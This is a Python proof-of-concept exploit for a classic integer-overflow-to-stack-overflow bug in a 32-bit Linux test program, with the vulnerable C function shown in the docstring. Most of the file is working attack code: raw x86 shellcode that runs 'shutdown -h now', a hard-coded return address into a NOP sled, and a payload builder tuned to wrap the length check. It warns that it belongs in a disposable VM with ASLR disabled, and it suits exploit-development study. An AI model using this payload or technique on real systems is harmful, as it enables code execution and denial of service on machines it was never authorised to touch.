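#!/usr/bin/env python
"""Integer-overflow -> stack-overflow PoC against a 32-bit Linux target.

Exploit : Linux 32-bit integer overflow that leads to a buffer overflow.
OS      : tested on Ubuntu 12.04 i386.
Author  : Oraclox (Brandon ceja)

Vulnerable C function
---------------------

    void validate_passwd(char* passwd){
        char passwd_buf[11];                       // buffer of size 11
        unsigned char passwd_len = strlen(passwd); // length truncated to 0..255
        if(passwd_len >= 4 && passwd_len <= 8){    // 260..264 wrap to 4..8 and pass
            printf("Valid Password\n");
            fflush(stdout);
            strcpy(passwd_buf, passwd);            // overflow happens here
        }else{
            printf("Invalid Passwd\n");
            fflush(stdout);
        }
        store_passwd_indb(passwd_buf);             // NOTE: also reached on the
                                                   // "invalid" path, with
                                                   // passwd_buf uninitialised
    }

The bug: strlen() returns size_t, but the result is stored in an
unsigned char, so any length L with 4 <= L % 256 <= 8 passes the check
and strcpy() copies the full L bytes into an 11-byte stack buffer.

Target build / environment assumed by the hard-coded offsets below:
    gcc -g -fno-stack-protector -z execstack -o vuln vuln.c
    ASLR off: sysctl kernel.randomize_va_space=0
The return address is specific to that setup; with ASLR, NX or a
different stack layout it will not land in the NOP sled.

Shellcode: Linux/x86 "shutdown -h now", 56 bytes.
From: Osanda Malith Jayathissa, http://shell-storm.org/shellcode/files/shellcode-876.php

WARNING: the shellcode execve()s /sbin///shutdown -h now -- a successful
run powers off the host (shutdown normally needs root, so an unprivileged
run may just fail).  Only run this inside a disposable VM.

All payload pieces are bytes, not str: under Python 3 a str payload would
be UTF-8 encoded by subprocess (e.g. "\\xf5" -> two bytes) and the return
address and padding would be silently corrupted.  Bytes literals also work
unchanged on Python 2.
"""
import sys
from subprocess import call

# Linux/x86 shutdown -h now shellcode, 56 bytes (see module docstring).
shellcode = (
    b"\x31\xc0\x31\xd2\x50\x66\x68\x2d"
    b"\x68\x89\xe7\x50\x6a\x6e\x66\xc7"
    b"\x44\x24\x01\x6f\x77\x89\xe7\x50"
    b"\x68\x64\x6f\x77\x6e\x68\x73\x68"
    b"\x75\x74\x68\x6e\x2f\x2f\x2f\x68"
    b"\x2f\x73\x62\x69\x89\xe3\x52\x56"
    b"\x57\x53\x89\xe1\xb0\x0b\xcd\x80"
)

# Payload layout (total 260 bytes; any total with 4 <= len % 256 <= 8,
# i.e. 260..264 here, bypasses the length check -- 260 is used):
#   24 bytes of filler up to the saved return address,
#    4 bytes overwriting EIP with 0xbffff530 (little-endian), which points
#      forward into the NOP sled / shellcode on the (non-randomised) stack,
#  232 bytes of NOP sled padded shellcode.
PAD_LEN = 24
RET_ADDR = b"\x30\xf5\xff\xbf"  # EIP -> 0xbffff530
NOP_SLED_LEN = 232
PAYLOAD_LEN = PAD_LEN + len(RET_ADDR) + NOP_SLED_LEN  # 260
DEFAULT_TARGET = "./vuln2"


def build_payload(code=shellcode, ret_addr=RET_ADDR):
    """Return the 260-byte argv string that triggers the overflow.

    Args:
        code: shellcode bytes placed at the end of the NOP sled.
        ret_addr: 4 little-endian bytes written over the saved EIP.

    Returns:
        bytes of length PAYLOAD_LEN: filler + ret_addr + NOP sled + code.

    Raises:
        ValueError: if the shellcode does not fit in the sled, if
            ret_addr is not 4 bytes, or if the resulting length would
            not wrap into the 4..8 window the target checks.  The
            original code would silently produce a payload of the wrong
            length in those cases (``b"\\x90" * negative == b""``).
    """
    if len(ret_addr) != 4:
        raise ValueError("ret_addr must be exactly 4 bytes, got %d" % len(ret_addr))
    if len(code) > NOP_SLED_LEN:
        raise ValueError(
            "shellcode is %d bytes, does not fit in the %d-byte sled"
            % (len(code), NOP_SLED_LEN)
        )
    payload = (
        b"A" * PAD_LEN
        + ret_addr
        + b"\x90" * (NOP_SLED_LEN - len(code))
        + code
    )
    # Sanity check the integer-overflow condition the target relies on:
    # (unsigned char)len must land in 4..8 or the strcpy() is never reached.
    if not 4 <= len(payload) % 256 <= 8:
        raise ValueError(
            "payload length %d does not wrap into the 4..8 window" % len(payload)
        )
    return payload


def main(argv):
    """Run the target with the crafted password as its second argument.

    Args:
        argv: sys.argv; an optional argv[1] overrides the target binary
            (default DEFAULT_TARGET, matching the original hard-coded path).

    Returns:
        The target's exit status, as returned by subprocess.call().
    """
    target = argv[1] if len(argv) > 1 else DEFAULT_TARGET
    evil = build_payload()
    print("Running vulnerable software...")
    # Argument list, not a shell string: the payload bytes reach the
    # target's argv verbatim and nothing is interpreted by a shell.
    return call([target, "oraclox", evil])


if __name__ == "__main__":
    sys.exit(main(sys.argv))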